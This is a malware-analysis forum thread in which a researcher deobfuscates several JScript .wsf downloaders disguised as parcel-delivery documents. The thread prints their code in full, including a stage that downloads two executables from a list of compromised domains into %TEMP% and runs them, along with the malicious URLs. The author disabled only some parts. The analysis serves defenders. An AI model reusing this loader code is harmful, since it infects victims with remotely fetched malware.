Malware Analysis 5 samples - download the real obfuscated Jscript code used to download 2 payloads- Jan,13 2017

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Edited :

From Jan,13 2017
- added Item-Delivery-Details-00000629997.doc.wsf&
- Undelivered-Package-00780518.doc.wsf

- added at the end of this thread : Delivery-Details.doc.wsf from 20-12-16 : same name, small differences, and domains/ URLS updated.


- added Undelivered-Parcel-ID-0000525244.doc.wsf from 03-01-2016

---------------------------------------------------------------------------
From https://malwaretips.com/threads/16-12-16-7.66632/
Thanks to @silversurfer
Delivery-Details.wsf - 5/54

Why this sample ?

Small first script : that download an obfuscated code that download the payloads :D

As often, I have modified some parts of the code to avoid copy-paste => save => infection :p

1) What it looks like :

What we can see when editing with notepad++ :
Code:
<job><script language=JScript>var y = "Msxml2.XMLHTTP"; var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy"; var x = new Array("aventurarealestatedirectory.com","capsynch.com","ocentsinus.com","ems-informatique.fr","www.apogeoform.net"); var w = "http ://"; for (var i=0; i<5; i++) { var r = "a"; var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb"; try { var t = x[ i ]; var s = "counter"; var z = new ActiveXObject(y); z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false); z.send(); if (z.status == 200) { z = z.responseText.split("~"); eval(z.join(r)); break; }; } catch(e) { }; };</script></job>

After some formatting :
Code:
<job>
    <script language=JScript>
        var y = "Msxml2.XMLHTTP";
        var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy";
        var x = new Array("aventurarealestatedirectory.com", "capsynch.com", "ocentsinus.com", "ems-informatique.fr", "www.apogeoform.net");
        var w = "http ://";
        for (var i = 0; i < 5; i++) {
            var r = "a";
            var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";
            try {
                var t = x[ i ];
                var s = "counter";
                var z = new ActiveXObject(y);
                z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false);
                z.send();
                if (z.status == 200) {
                    z = z.responseText.split("~");
                    eval(z.join(r));
                    break;
                };
            } catch (e) {};
        };
    </script>
</job>

It is very easy to understand the content :


Several vars are created with important parts :

var y = "Msxml2.XMLHTTP";​

=> string used to create later the http object

var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy";​

=> string used as a value for the parameter "i" of the future complete built URLs

var x = new Array(
"aventurarealestatedirectory.com",
"capsynch.com",
"ocentsinus.com",
"ems-informatique.fr",
"www .apogeoform.net"​
);

=> An array of domains (will be used to build the URLs)
var w = "http://";

=> first part of future URLs
for (var i = 0; i < 5; i++) {
=> A loop is done from 0 to 4 max : stops as soon as a working URL built in the loop works.

var r = "a";

=> used later, on the join function (each part will be join adding a "a")
=> also used as a parameter in the URLs

var z = new ActiveXObject(y);​

=> z = new ActiveXObject("Msxml2.XMLHTTP")

=> creates a http object, to make the request
var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";

=> used as value for the parameter "a" in the future URLs
try {
var t = x[ i ];

=> i : current index of the loop

=> t = one of the domains

index i : 0 => "aventurarealestatedirectory.com",
index i : 1 => "capsynch.com",
index i : 2 => "ocentsinus.com",
index i : 3 => "ems-informatique.fr",
index i : 4 => "www .apogeoform.net"
var s = "counter";

=> another part of future URLs
var z = new ActiveXObject(y);

=> new ActiveXObject("Msxml2.XMLHTTP");

=> creates the http object, will be used to make the requests

z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false);

=> opens a connection with the current URL
=> Example with index i : 0 :


"http://aventurarealestatedirectory.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy"
z.send();

=> sends the request to the current URL
if (z.status == 200) {

=> test the status value of the request
=> 200 means a success

z = z.responseText.split("~");

=> Here, the script use the responseText and not the responseBody we used to see in other analysis.
=> the data received are means to be text ! And not binary (for example a payload exe / dll file)

The .split("~") function split the string received in several parts, using the "~" as separator (this char is lost).
The http object is then overwritten by the array of string resulting of the split function:

Example :

var example_string = "test~lalala~omg~lol" ;

=> var example_array = example_string.split("~");

=> example_array: [ "test", "lalala", "omg", "lol"]
eval(z.join(r));

=> here : z.join(r) with r = "a" (see above parts where the var r was created)

=> this function joins the different parts of the array of string, using r as separator (the content of r !)

Example :

example_array :"test" "lalala" "omg" "lol"

=> new_string = example_array.join("a")

=> new_string : "testalalalaaomgalol"
The eval function => evaluate the string => runs its content
break;

=> quits the loop, because a working URL was found
};
} catch (e) {};

2) eval(z.join(r)) : what is the content of the string that is evaluated :

After some changed :
\" (for the interpreter) replace by "
Code:
var a = ""; a += 'var ad="1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb'; a += '"; var '; a += 'ld=0; v'; a += 'ar cq='; a += 'String.f'; a += 'romChar'; a += 'Code(34);'; a += ' var cs'; a += '=String'; a += '.fromCha'; a += 'rCode'; a += '(92); v'; a += 'ar ll=['; a += '"oytunid'; a += 'il.com","'; a += 'ems-inf'; a += 'ormatique.'; a += 'fr","www'; a += '.linguae'; a += 'world.it"'; a += ',"www'; a += '.ibla'; a += 'soni.c'; a += 'om","'; a += 'capsync'; a += 'h.com"]; '; a += 'var ws=WSc'; a += 'ript.Cr'; a += 'eateObje'; a += 'ct("WS'; a += 'cript'; a += '.Shel'; a += 'l"); v'; a += 'ar fn='; a += 'ws.Expan'; a += 'dEnvironme'; a += 'ntStrings('; a += '"%TEM'; a += 'P%")+cs+"'; a += 'a"; var x'; a += 'o=WScript.'; a += 'CreateOb'; a += 'ject("Msxm'; a += 'l2.XM'; a += 'LHTTP"); '; a += 'var xa'; a += '=WScrip'; a += 't.Cre'; a += 'ateObjec'; a += 't("ADODB.S'; a += 'tream_")'; a += '; var'; a += ' fo=W'; a += 'Script.C'; a += 'reateObje'; a += 'ct("Scr'; a += 'ipting.F'; a += 'ileSy'; a += 'stemObj'; a += 'ect"); if'; a += ' (!fo.Fi'; a += 'leExists(f'; a += 'n+".txt'; a += '")) { v'; a += 'ar fp='; a += 'fo.CreateT'; a += 'extFile'; a += '(fn+".tx'; a += 't",true'; a += '); fp'; a += '.WriteLi'; a += 'ne("");'; a += ' fp.Clo'; a += 'se();'; a += ' for('; a += 'var n='; a += '1;n<='; a += '2;n++) { '; a += 'for(var i'; a += '=ld;i<'; a += 'll.length;'; a += 'i++) '; a += '{ var dn=0'; a += '; try {'; a += ' xo.op'; a += 'en("G'; a += 'ET","ht'; a += 'tp ://"+l'; a += 'l[i]+"/co'; a += 'unter/?a="'; a += '+ad+"&r='; a += '"+i+n, f'; a += 'alse); xo'; a += '.send'; a += '(); i'; a += 'f(xo.sta'; a += 'tus=='; a += '200) {'; a += ' xa.ope'; a += 'n(); xa.ty'; a += 'pe=1;'; a += ' xa.writ'; a += 'e(xo.'; a += 'responseBo'; a += 'dy); if'; a += '(xa.size'; a += '>1000) { d'; a += 'n=1; '; a += 'xa.saveToF'; a += 'ile(fn+'; a += 'n+".ex'; a += 'e",2); try'; a += '{ws.R'; a += 'un(fn+n+'; a += '".exe'; a += '",1,0'; a += ');}ca'; a += 'tch(e'; a += 'r){}; }'; a += '; xa.close'; a += '(); };'; a += ' if(dn==1'; a += '){ld=i;bre'; a += 'ak;}; '; a += '} catch('; a += 'er){}; '; a += '}; }; '; a += '};'; eval(a);

We can see in this part that :

var a = "";

=> a var a is created, as an empty string

and then different parts are added to this var a, and at the end :

eval(a);

=> the content of this string a is evaluated => run

This is the a string converted in its code, with some formatting I made to be more readable code :

var ad = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";

=> value for parameter "a=" of the future built URLs

var ld = 0;

=> will be be used to initialize a loop index
var cq = String.fromCharCode(34);

=> "

var cs = String.fromCharCode(92);

=> \
var ll = [
"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"​
];

=> array of domains : used to build the URLs for the http requests

var ws = WScript.CreateObject("WScript.Shell");

=> Shell object to use the run function (at the end)
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";

=> %TEMP%\a
=> spoil : the path\name for the payloads, without the exe extension (will be add later, with a number)

var xo = WScript.CreateObject("Msxml2.XMLHTTP");

=> creates the http object

var xa = WScript.CreateObject("ADODB.Stream");

=> creates the ADO stream object to manipulate the data received from future request

var fo = WScript.CreateObject("Scripting.FileSystemObject");

=> creates a file system object : to manipulate files / folders

if (!fo.FileExists(fn + ".txt")) {

=> checks if an a.txt file exist in %TEMP%\ folder : clue to know if the payload has already been downloaded

var fp = fo.CreateTextFile(fn + ".txt", true);

=> if not : creates the a.txt file

Example : : C:\Users\DardiM\AppData\Local\Temp\a.txt

fp.WriteLine("");

=> writes an empty line inside
fp.Close();

=> closes the file
for (var n = 1; n <= 2; n++) {

=> first Loop to find a working URL :

=> n : second digit for parameter r=
=> value :1 or 2 : first or second payload to download

for (var i = ld; i < ll.length; i++) {

=> second Loop to find a working URL :

=> i : index of domain in the array ll and first digit for the the parameter r=
=> value : 0 to 4 (5 domains on the array)

Remember that :

var ll = [
"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"
];
var dn = 0;

=> dn : 1 if a working URL (taking into account the parameters) has be found
try {
xo.open("GET", "http ://" + ll[ i ] + "/counter/?a=" + ad + "&r=" + i + n, false);

=> tries the current URL :

=> if a working index i is found, the next loop will be with the same value for i (the var dn is used as flag)

=> then the same domain from the array will be used, but the paramete r for the URL built will change because of the index n value (n= 1 for the first file, and 2 for the second)
Example :

- index : i : 0 : first domain used from the array : oytunidil.com

- index n : 1 : first file => a1.exe
- index n : 2 : second file => a2.exe
=> then : r=01
and :
"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=01"
Remember that :

var ll = [
"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"
];
xo.send();

=> sends the request
if (xo.status == 200) {

=> if http request ok
xa.open();

=> open the stream object
xa.type = 1;

=> 1 : data treated as binary
xa.write(xo.responseBody);

=> data received put in the stream
if (xa.size > 1000) {
=> is the size > 1000 ?
dn = 1;

=> it means that a valid payload has been found
=> dn is a flag to make the script remembers

xa.saveToFile(fn + n + ".exe", 2);

=> saved the data received in the path "%TMP%\a" + n + ".exe"
=> n : 1 or 2 : depends of the loop that worked

=> 2 : create or overwrite if exist

Example : %TMP%\a1.exe fot the first payload


=> C:\Users\DardiM\AppData\Local\Temp\a1.exe
try {
ws.Run(fn + n + ".exe", 1, 0);

=> uses the Shell object Run function (see above parts)
=> runs the payload

} catch (er) { };
};
xa.close();

=> closes the stream object
};
if (dn == 1) {

=> if dn == 1
=> that means a 'good' payload has been found (valid size)
(a1.exe first, a2.exe in second, depending of n value of first loop)

ld = i;

=> forces the index i to stay the current index that worked
break;

=> quits the current loop (with i as index)
=> if n = 2, that means the payload a2.exe has also been downloaded : end of the loops
};
} catch (er) { };
};
};
};

About the two loops :

for (var n = 1; n <= 2; n++) {

for (var i = ld; i < ll.length; i++) {
...
}​
...
}

n: 1 => first payload (a1.exe)
n: 2 => second payload (a2.exe)

For each value of n : the index i is used to built a entire URL (with parameters)

the parameter r= is used with 2 digits:

first digit : index i used to retrieve the small url part from the array : from 0 to 4
second digit : n : used to differentiate the two payloads needed a1.exe and a2.exe

=> Therefore, each URLs built has a parameter r=in (replace i and n by their values)
=> 01 11 21 31 41 (first loop with n =1 and i : 0 to 4 max)
=> 02 12 22 32 42 (second loop with n = 2 and i : 0 to 4 max)

index i : 0 to 4 max because it will stop at the i where the first URL that worked
=> when a working index i is find (for the first payload), it will be used to find the second payload => only the index n will change (1 for the first payload, 2 for the second)

The two payloads are downloaded from same URLS but only with a new r= parameter.
=> if the first payload has been succesfully downloaded from :

"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=11"​

Then it tries to download the second payload with r=12 from the main principal URL​

"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=12"​

3) Conlusion :

URLs to download the JScript code :

hxxp://aventurarealestatedirectory.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://ocentsinus.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://www .apogeoform.net/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy​

URLs to download the Payloads :

a1.exe :

"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=01"
"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=11"
"http ://www .linguaeworld.it/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=21"
"http ://www .iblasoni.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=31"
"http ://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=41"
a2.exe :

"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=02"
"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=12"
"http ://www .linguaeworld.it/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=22"
"http ://www .iblasoni.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=32"
"http ://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=42"​

 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Thank you my penguin friend for making this so much clearer for me to understand..... BIG HUGS!

Very clear explanation once I read the entire post instead of the codes. +10 for you.
Thanks :)
Big hug to you, too !
I just edited my first post to make an explanation of the two loops (one inside a second)
 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
:p I noticed after I send you the PM, nonetheless, those edits really help me understand the entire code behind this .WSF

I felt silly, I should have understood it soon if i read the entire Var and Loops, thank you for pointing that out and editing it...
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
:p I noticed after I send you the PM, nonetheless, those edits really help me understand the entire code behind this .WSF

I felt silly, I should have understood it soon if i read the entire Var and Loops, thank you for pointing that out and editing it...
My 'problem' is that I often edit a post, even several hours after it has been posted, because each time I read what I wrote, I find parts that can be not very clear or be improved :oops:

I will edit another times, I have retrieved the two payloads, will launch online analysis and put the links.
 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
I think now I will not modify more :)
(2:32 pm)

Tomorrow, I will post a very short analysis : the smaller script-based sample (with obfuscation :rolleyes:) I have ever seen :)

:D I don't know what to say after reading your new edits. I can practically write one myself now, LoL. Its so transparent, I can see the light my friend, I can see the light of wisdom you have bestow upon me and open my eyes.

MODS: Is there a way to + over 9000 on a post?
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
:D I don't know what to say after reading your new edits. I can practically write one myself now, LoL. Its so transparent, I can see the light my friend, I can see the light of wisdom you have bestow upon me and open my eyes.

MODS: Is there a way to + over 9000 on a post?
LOL ! => <3
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
The aim of this present post is mainly the conclusion, see the first post for explanations about the functions :p

From https://malwaretips.com/threads/20-12-16-10.66756/
Thanks to @silversurfer

Delivery-Details.doc.wsf

A similar sample : same method of downloading the text and then evaluate the string, to built the real part :

=> download 2 payloads.

https://www.reverse.it/sample/c05a0...e4a8749127369b53278ade505ea?environmentId=100
Antivirus scan for c05a083c524abc9201cd20d6e18dd7c1de5eae4a8749127369b53278ade505ea at 2016-12-20 16:12:54 UTC - VirusTotal

1) Main Code :
Code:
<job>
    <script language=JScript>
        var m = "binging";
        var g = "/counter/?a=";
        var x = new Array("www.linguaeworld.it", "oytunidil.com", "med-lex.com", "offie.nl", "mercadoatlantico.com.br");

        function yay(z) {
            z = z.join(r);
           // eval(z); => put in comment to avoid copy-paste => run => infection
        };
        for (var i = 0; i < 5; i++) {
            var r = "a";
            try {
                g += "18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=" + m + "&i=";
                var z = new ActiveXObject("Msxml2.XMLHTTP");
                z.open("GET", "http://" + x[i] + g + "LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU", false);
                z.send();
                if (z.status == 200) {
                    yay(z.responseText.split(m));
                    break;
                };
            } catch (e) {};
        };
    </script>
</job>

Previous sample :

if (z.status == 200) {
z = z.responseText.split("~");
eval(z.join(r));
break;
};

This sample : if the request has a status = OK

if (z.status == 200) {
yay(z.responseText.split(m));

=> call a function that do :

z = z.responseText.split("~");
and eval(z.join(r));

break;
};

Not a big modification :p

2) Text download :
Code:
  vbingingr binging = ""; binging += 'vbingingr binging'; binging += 'd="18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";'; binging += ' vbingingr ld=0;'; binging += ' vbingingr cs=St'; binging += 'ring.f'; binging += 'romChbingingr'; binging += 'Code(92); '; binging += 'vbingingr l'; binging += 'l=["chbingingitbinging'; binging += 'nybingingimpex'; binging += '.org","'; binging += 'www.pegbingingmo'; binging += 'ntsbinging.ro",'; binging += '"inst'; binging += 'binginglbingingciondebinging'; binging += 'irespli'; binging += 't.com","m'; binging += 'ercbingingdo'; binging += 'bingingtlbingingn'; binging += 'tico.'; binging += 'com.br","'; binging += 'offie.n'; binging += 'l"]; vbingingr '; binging += 'ws=WSc'; binging += 'ript.Cr'; binging += 'ebingingteObjec'; binging += 't("WS'; binging += 'cript.'; binging += 'Shell")'; binging += '; vbingingr fn=w'; binging += 's.ExpbingingndEn'; binging += 'vironme'; binging += 'ntString'; binging += 's("%TEMP'; binging += '%")+cs+"'; binging += 'binging"; vbinging'; binging += 'r xo=WScri'; binging += 'pt.CrebingingteO'; binging += 'bject("Msx'; binging += 'ml2.XMLH'; binging += 'TTP");'; binging += ' vbingingr xbinging='; binging += 'WScri'; binging += 'pt.Cre'; binging += 'bingingteOb'; binging += 'ject("'; binging += 'ADODB.St'; binging += 'rebingingm"); '; binging += 'vbingingr fo='; binging += 'WScrip'; binging += 't.Crebinging'; binging += 'teObject('; binging += '"Scri'; binging += 'pting.'; binging += 'FileSystem'; binging += 'Object"); '; binging += 'if (!fo.'; binging += 'FileEx'; binging += 'ists(fn+'; binging += '".txt"'; binging += ')) { vbinging'; binging += 'r fp=f'; binging += 'o.Crebinging'; binging += 'teTex'; binging += 'tFile(f'; binging += 'n+".txt",'; binging += 'true);'; binging += ' fp.WriteL'; binging += 'ine("");'; binging += ' fp.Close'; binging += '(); for('; binging += 'vbingingr n=1'; binging += ';n<=2;'; binging += 'n++) { fo'; binging += 'r(vbingingr i=l'; binging += 'd;i<ll.l'; binging += 'ength;'; binging += 'i++) { vbingingr'; binging += ' dn=0; try'; binging += ' { xo.o'; binging += 'pen("G'; binging += 'ET","http:'; binging += '//"+ll'; binging += '[i]+"/c'; binging += 'ounter'; binging += '/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEbinginggXXjZjJHeiXcM6L36bV6MdACTU&binging="'; binging += '+bingingd+"&r="+'; binging += 'i+n, f'; binging += 'binginglse);'; binging += ' xo.se'; binging += 'nd(); if'; binging += '(xo.stbinging'; binging += 'tus=='; binging += '200) {'; binging += ' xbinging.open()'; binging += '; xbinging.typ'; binging += 'e=1; xbinging.wr'; binging += 'ite(xo.r'; binging += 'esponseBod'; binging += 'y); if(xbinging.'; binging += 'size>10'; binging += '000) { dn'; binging += '=1; xbinging.'; binging += 'sbingingveTo'; binging += 'File(fn+n+'; binging += '".exe"'; binging += ',2); t'; binging += 'ry{ws'; binging += '.Run(fn'; binging += '+n+".ex'; binging += 'e",1,0)'; binging += ';}cbingingtc'; binging += 'h(er)'; binging += '{}; }; '; binging += 'xbinging.clo'; binging += 'se(); };'; binging += ' if(dn'; binging += '==1){ld=i'; binging += ';brebingingk'; binging += ';}; } c'; binging += 'bingingtch(er){'; binging += '}; }; '; binging += '}; };'; evbingingl(binging);};};

3) Code that is run After binging => a :
Code:
var a = "";
        a += 'var a';
        a += 'd="18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";';
        a += ' var ld=0;';
        a += ' var cs=St';
        a += 'ring.f';
        a += 'romChar';
        a += 'Code(92); ';
        a += 'var l';
        a += 'l=["chaita';
        a += 'nyaimpex';
        a += '.org","';
        a += 'www.pegamo';
        a += 'ntsa.ro",';
        a += '"inst';
        a += 'alaciondea';
        a += 'irespli';
        a += 't.com","m';
        a += 'ercado';
        a += 'atlan';
        a += 'tico.';
        a += 'com.br","';
        a += 'offie.n';
        a += 'l"]; var ';
        a += 'ws=WSc';
        a += 'ript.Cr';
        a += 'eateObjec';
        a += 't("WS';
        a += 'cript.';
        a += 'Shell")';
        a += '; var fn=w';
        a += 's.ExpandEn';
        a += 'vironme';
        a += 'ntString';
        a += 's("%TEMP';
        a += '%")+cs+"';
        a += 'a"; va';
        a += 'r xo=WScri';
        a += 'pt.CreateO';
        a += 'bject("Msx';
        a += 'ml2.XMLH';
        a += 'TTP");';
        a += ' var xa=';
        a += 'WScri';
        a += 'pt.Cre';
        a += 'ateOb';
        a += 'ject("';
        a += 'ADODB.St';
        a += 'ream"); ';
        a += 'var fo=';
        a += 'WScrip';
        a += 't.Crea';
        a += 'teObject(';
        a += '"Scri';
        a += 'pting.';
        a += 'FileSystem';
        a += 'Object"); ';
        a += 'if (!fo.';
        a += 'FileEx';
        a += 'ists(fn+';
        a += '".txt"';
        a += ')) { va';
        a += 'r fp=f';
        a += 'o.Crea';
        a += 'teTex';
        a += 'tFile(f';
        a += 'n+".txt",';
        a += 'true);';
        a += ' fp.WriteL';
        a += 'ine("");';
        a += ' fp.Close';
        a += '(); for(';
        a += 'var n=1';
        a += ';n<=2;';
        a += 'n++) { fo';
        a += 'r(var i=l';
        a += 'd;i<ll.l';
        a += 'ength;';
        a += 'i++) { var';
        a += ' dn=0; try';
        a += ' { xo.o';
        a += 'pen("G';
        a += 'ET","http:';
        a += '//"+ll';
        a += '[i]+"/c';
        a += 'ounter';
        a += '/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a="';
        a += '+ad+"&r="+';
        a += 'i+n, f';
        a += 'alse);';
        a += ' xo.se';
        a += 'nd(); if';
        a += '(xo.sta';
        a += 'tus==';
        a += '200) {';
        a += ' xa.open()';
        a += '; xa.typ';
        a += 'e=1; xa.wr';
        a += 'ite(xo.r';
        a += 'esponseBod';
        a += 'y); if(xa.';
        a += 'size>10';
        a += '000) { dn';
        a += '=1; xa.';
        a += 'saveTo';
        a += 'File(fn+n+';
        a += '".exe"';
        a += ',2); t';
        a += 'ry{ws';
        a += '.Run(fn';
        a += '+n+".ex';
        a += 'e",1,0)';
        a += ';}catc';
        a += 'h(er)';
        a += '{}; }; ';
        a += 'xa.clo';
        a += 'se(); };';
        a += ' if(dn';
        a += '==1){ld=i';
        a += ';break';
        a += ';}; } c';
        a += 'atch(er){';
        a += '}; }; ';
        a += '}; };';
        //eval(a); => put in comment to avoid copy-paste => run => infection

4) Real part built :
Code:
var ad = "18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";
var ld = 0;
var cs = String.fromCharCode(92);
var ll = ["chaitanyaimpex.org", "www.pegamontsa.ro", "instalaciondeairesplit.com", "mercadoatlantico.com.br", "offie.nl"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("");
    fp.Close();
    for (var n = 1; n <= 2; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=" + ad + "&r=" + i + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.open();
                    xa.type = 1;
                    xa.write(xo.responseBody);
                    if (xa.size > 10000) {
                        dn = 1;
                        xa.saveToFile(fn + n + ".exe", 2);
                        try {
                            // ws.Run(fn + n + ".exe", 1, 0); => put in comment to avoid copy-paste => run => infection
                        } catch (er) {};
                    };
                    xa.close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
};

5) Conclusion :

Only small differences on the first script in comparison with the previous sample.

The part built to download the two payloads are very similar to the previous version seen (first post) :
=>the main differences are the domains and URLs used (parameters, etc)

URLs to download the JScript code :

Domains :

www .linguaeworld.it
oytunidil.com
med-lex.com
offie.nl
mercadoatlantico.com.br​

http://domain/counter/?a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=binging&i=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=binging&i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU​

URLs to download the Payloads :

Domains :

chaitanyaimpex.org
www .pegamontsa.ro
instalaciondeairesplit.com
mercadoatlantico.com.br
offie.nl​

a1.exe :

http://domaine1/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=01
http://domaine2/counter/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=11
http://domaine3/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=21
http://domaine4/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=31
http://domaine5/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=41
a2.exe :

http://domaine1/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=02
http://domaine2/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=12
